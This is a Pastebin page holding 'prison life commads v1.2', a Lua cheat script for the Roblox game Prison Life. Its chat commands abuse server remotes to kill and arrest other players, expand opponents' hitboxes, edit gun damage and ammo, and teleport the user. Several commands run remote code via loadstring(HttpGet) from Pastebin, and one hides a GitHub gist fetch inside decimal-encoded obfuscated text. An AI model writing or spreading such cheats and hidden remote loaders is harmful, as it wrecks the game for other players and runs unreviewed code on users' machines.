Advertisement
imakeexploits

prison life commads v1.2

Sep 16th, 2022
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.62 KB | None | 0 0
  1. -- added new commads such like:
  2. -- :guard expanded hitbox
  3. -- :inmate expanded hitbox
  4. -- :crims expanded hitbox
  5. -- :(gun name) inf ammo
  6. -- :(gun name) fast reload
  7. -- and much more!
  8.  
  9. local Player = game.Players.LocalPlayer
  10.  
  11. Player.Chatted:connect(function(cht)
  12. if cht:match(":remove doors") then
  13. Workspace.Prison_Cellblock.doors:Destroy()
  14.  
  15. for i,v in pairs(workspace:GetChildren())do
  16. if v.Name == "Doors" then
  17. v:Destroy()
  18. end
  19. end
  20. elseif cht:match(":get all gun") then
  21. for i,v in pairs(Workspace.Prison_ITEMS.giver:GetChildren()) do
  22.  
  23. OwO = Workspace.Remote.ItemHandler:InvokeServer(v.ITEMPICKUP)
  24. end
  25. elseif cht:match(":no crims") then
  26. local Player = game.Players.LocalPlayer
  27. local cpos = Player.Character.HumanoidRootPart.CFrame
  28. for i,v in pairs(game.Teams.Criminals:GetPlayers()) do
  29. if v.Name ~= Player.Name then
  30. local i = 10
  31. repeat
  32. wait()
  33. i = i-1
  34. game.Workspace.Remote.arrest:InvokeServer(v.Character.HumanoidRootPart)
  35. Player.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 1)
  36. until i == 0
  37. end
  38. end
  39. Player.Character.HumanoidRootPart.CFrame = cpos
  40. Notify("Success", "Arrested all of the n00bs", "Cool!")
  41. elseif cht:match(":no taser") then
  42. game.Players.LocalPlayer.Character.ClientInputHandler.Disabled = true
  43. game.Players.LocalPlayer.CharacterAdded:connect(function()
  44. game.Workspace:WaitForChild(game.Players.LocalPlayer.Name)
  45. game.Players.LocalPlayer.Character.ClientInputHandler.Disabled = true
  46. end)
  47. elseif cht:match(":aura") then
  48. mainRemotes = game.ReplicatedStorage
  49. meleeRemote = mainRemotes['meleeEvent']
  50.  
  51. killAura = true
  52.  
  53. contextactionservice = game.ContextActionService
  54.  
  55. function toggleKillAura(actionName, inputState, inputObject)
  56. print('Doing the action : ' .. actionName)
  57. if inputState == Enum.UserInputState.Begin then
  58. if killAura == true then
  59. killAura = false
  60. else
  61. killAura = true
  62. end
  63. end
  64. end
  65.  
  66. contextactionservice:BindAction('ToggleKillAura', toggleKillAura, false, Enum.KeyCode.K)
  67.  
  68. while wait() do
  69. if killAura == true then
  70. for _, plr in pairs (game:GetService('Players'):GetChildren()) do
  71. if plr.Name ~= game.Players.LocalPlayer.Name then
  72. meleeRemote:FireServer(plr)
  73. end
  74. end
  75. end
  76. end
  77. elseif cht:match(":be neutral") then
  78. Workspace.Remote.TeamEvent:FireServer("Medium stone grey")
  79. elseif cht:match(":super punch") then
  80. loadstring(game:HttpGet(("https://pastebin.com/raw/25z2hjXP"), true))()
  81. elseif cht:match(":be inmate") then
  82. workspace.Remote.TeamEvent:FireServer("Bright orange")
  83. elseif cht:match(":btool") then
  84. Instance.new("HopperBin", game.Players.LocalPlayer.Backpack).BinType = 4
  85. elseif cht:match(":be cop") then
  86. workspace.Remote.TeamEvent:FireServer("Bright blue")
  87. elseif cht:match(":be crim") then
  88. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-943, 96, 2055)
  89. elseif cht:match(":go to guard area") then
  90. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(802,99,2270)
  91. elseif cht:match(":go to crim base") then
  92. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-943, 96, 2055)
  93. elseif cht:match(":go to prison") then
  94. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(879,99,2377)
  95. elseif cht:match(":reset") then
  96. game.Players.LocalPlayer.Character:Destroy()
  97. elseif cht:match("gui") then
  98. loadstring(game:HttpGet(("https://pastebin.com/raw/VZNfEYXs"), true))()
  99. elseif cht:match("hardcore") then
  100. loadstring(game:HttpGet('https://pastebin.com/raw/vsFeeipV'))()
  101. elseif cht:match(".go to yard") then
  102. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(779.87,98,2458.93)
  103. elseif cht:match(":fast remington") then
  104. local player = game:GetService("Players").LocalPlayer
  105. local gun = player.Backpack:FindFirstChild("Remington 870")
  106. local sM = require(gun:FindFirstChild("GunStates"))
  107. sM["Damage"] = 999
  108. sM["MaxAmmo"] = 9999991
  109. sM["StoredAmmo"] = 9999991
  110. sM["FireRate"] = 0.05
  111. sM["AmmoPerClip"] = 9999991
  112. sM["Range"] = 5000
  113. sM["ReloadTime"] = 0.05
  114. sM["Bullets"] = 10
  115. sM["AutoFire"] = true
  116. elseif cht:match(":click tp") then
  117. game:GetService("StarterGui"):SetCore("SendNotification",{
  118. Title = "Click TP Enabled!",
  119. Text = "Tap Left Alt to TP to your mouse.",
  120. Duration = 10,
  121. })
  122. local player = game.Players.LocalPlayer
  123. mouse = player:GetMouse()
  124.  
  125. game:GetService("UserInputService").InputBegan:connect(function(inputObject, gameProcessedEvent)
  126. if inputObject.KeyCode == Enum.KeyCode.LeftAlt then
  127. local pos = mouse.Hit+Vector3.new(0,2.5,0)
  128. pos = CFrame.new(pos.X,pos.Y,pos.Z)
  129. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
  130. end
  131. end)
  132. print("Successfully Executed Script!")
  133. elseif cht:match(":tp frame") then
  134. loadstring(game:HttpGet(("https://pastebin.com/raw/bvLWiNGY"), true))()
  135. elseif cht:match(":fly") then
  136. loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
  137. elseif cht:match(":xray") then
  138. game:GetService("StarterGui"):SetCore("SendNotification",{
  139. Title = "Loaded",
  140. Text = "press e for active and desactive x-ray",
  141. Duration = 5,
  142. })
  143.  
  144. local xrayHotkey = Enum.KeyCode.E
  145.  
  146. local uis = game:GetService("UserInputService")
  147.  
  148.  
  149. local xrayOn = false
  150.  
  151.  
  152. uis.InputBegan:Connect(function(inp, processed)
  153.  
  154.  
  155. if processed then return end
  156.  
  157.  
  158. if inp.KeyCode == xrayHotkey then
  159.  
  160.  
  161. xrayOn = not xrayOn
  162.  
  163.  
  164. for i, descendant in pairs(workspace:GetDescendants()) do
  165.  
  166. if descendant:IsA("BasePart") then
  167.  
  168. if xrayOn then
  169.  
  170. if not descendant:FindFirstChild("OriginalTransparency") then
  171.  
  172. local originalTransparency = Instance.new("NumberValue")
  173. originalTransparency.Name = "OriginalTransparency"
  174. originalTransparency.Value = descendant.Transparency
  175. originalTransparency.Parent = descendant
  176. end
  177.  
  178. descendant.Transparency = 0.5
  179.  
  180. else
  181. descendant.Transparency = descendant.OriginalTransparency.Value
  182. end
  183. end
  184. end
  185. end
  186. end)
  187. elseif cht:match(":guard expanded hitbox") then
  188. _G.HeadSize = 10
  189. _G.Disabled = true
  190. _G.Reset = true
  191.  
  192. game:GetService('RunService').RenderStepped:connect(function()
  193. if _G.Disabled then
  194. for i,v in pairs(game.Teams["Guards"]:GetPlayers()) do
  195. if v.Name ~= game:GetService('Players').LocalPlayer.Name then
  196. pcall(function()
  197. v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
  198. v.Character.HumanoidRootPart.Transparency = 0.7
  199. v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really blue")
  200. v.Character.HumanoidRootPart.Material = "Neon"
  201. v.Character.HumanoidRootPart.CanCollide = false
  202. end)
  203. if _G.Reset then
  204. if v.Character.Humanoid.Health == 0 then
  205. v.Character.HumanoidRootPart.Size = Vector3.new(1,1,1)
  206. end
  207. end
  208. end
  209. end
  210. end
  211. end)
  212. elseif cht:match(":inmate expanded hitbox") then
  213. _G.HeadSize = 10
  214. _G.Disabled = true
  215. _G.Reset = true
  216.  
  217. game:GetService('RunService').RenderStepped:connect(function()
  218. if _G.Disabled then
  219. for i,v in pairs(game.Teams["Inmates"]:GetPlayers()) do
  220. if v.Name ~= game:GetService('Players').LocalPlayer.Name then
  221. pcall(function()
  222. v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
  223. v.Character.HumanoidRootPart.Transparency = 0.7
  224. v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Bright orange")
  225. v.Character.HumanoidRootPart.Material = "Neon"
  226. v.Character.HumanoidRootPart.CanCollide = false
  227. end)
  228. if _G.Reset then
  229. if v.Character.Humanoid.Health == 0 then
  230. v.Character.HumanoidRootPart.Size = Vector3.new(1,1,1)
  231. end
  232. end
  233. end
  234. end
  235. end
  236. end)
  237. elseif cht:match(":crims expanded hitbox") then
  238. _G.HeadSize = 10
  239. _G.Disabled = true
  240. _G.Reset = true
  241.  
  242. game:GetService('RunService').RenderStepped:connect(function()
  243. if _G.Disabled then
  244. for i,v in pairs(game.Teams["Criminals"]:GetPlayers()) do
  245. if v.Name ~= game:GetService('Players').LocalPlayer.Name then
  246. pcall(function()
  247. v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
  248. v.Character.HumanoidRootPart.Transparency = 0.7
  249. v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Medium stone grey")
  250. v.Character.HumanoidRootPart.Material = "Neon"
  251. v.Character.HumanoidRootPart.CanCollide = false
  252. end)
  253. if _G.Reset then
  254. if v.Character.Humanoid.Health == 0 then
  255. v.Character.HumanoidRootPart.Size = Vector3.new(1,1,1)
  256. end
  257. end
  258. end
  259. end
  260. end
  261. end)
  262. elseif cht:match(":ak47 fast reload") then
  263. local player = game:GetService("Players").LocalPlayer
  264. local gun = player.Backpack:FindFirstChild("AK-47")
  265. local sM = require(gun:FindFirstChild("GunStates"))
  266. sM["ReloadTime"] = 0.05
  267. elseif cht:match(":M9 fast reload") then
  268. local player = game:GetService("Players").LocalPlayer
  269. local gun = player.Backpack:FindFirstChild("M9")
  270. local sM = require(gun:FindFirstChild("GunStates"))
  271. sM["ReloadTime"] = 0.05
  272. elseif cht:match(":Remington 870 fast reload") then
  273. local player = game:GetService("Players").LocalPlayer
  274. local gun = player.Backpack:FindFirstChild("Remington 870")
  275. local sM = require(gun:FindFirstChild("GunStates"))
  276. sM["ReloadTime"] = 0.05
  277. elseif cht:match(":taser fast reload") then
  278. local player = game:GetService("Players").LocalPlayer
  279. local gun = player.Backpack:FindFirstChild("Taser")
  280. local sM = require(gun:FindFirstChild("GunStates"))
  281. sM["ReloadTime"] = 0.05
  282. elseif cht:match(":ak47 inf ammo") then
  283. local player = game:GetService("Players").LocalPlayer
  284. local gun = player.Backpack:FindFirstChild("AK-47")
  285. local sM = require(gun:FindFirstChild("GunStates"))
  286. sM["MaxAmmo"] = 9999991
  287. sM["Damage"] = 999
  288. elseif cht:match(":M9 inf ammo") then
  289. local player = game:GetService("Players").LocalPlayer
  290. local gun = player.Backpack:FindFirstChild("M9")
  291. local sM = require(gun:FindFirstChild("GunStates"))
  292. sM["MaxAmmo"] = 9999991
  293. sM["Damage"] = 999
  294. elseif cht:match(":Remington 870 inf ammo") then
  295. local player = game:GetService("Players").LocalPlayer
  296. local gun = player.Backpack:FindFirstChild("Remington 870")
  297. local sM = require(gun:FindFirstChild("GunStates"))
  298. sM["MaxAmmo"] = 9999991
  299. sM["Damage"] = 999
  300. elseif cht:match(":taser inf ammo") then
  301. local player = game:GetService("Players").LocalPlayer
  302. local gun = player.Backpack:FindFirstChild("Taser")
  303. local sM = require(gun:FindFirstChild("GunStates"))
  304. sM["MaxAmmo"] = 9999991
  305. sM["Damage"] = 999
  306. elseif cht:match(":dex explorer") then
  307. loadstring(game:GetObjects('rbxassetid://2180084478')[1].Source)()
  308. elseif cht:match(":combat help") then
  309. loadstring(game:HttpGet(("https://pastebin.com/raw/akLGF7Yf"), true))()
  310. end
  311. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement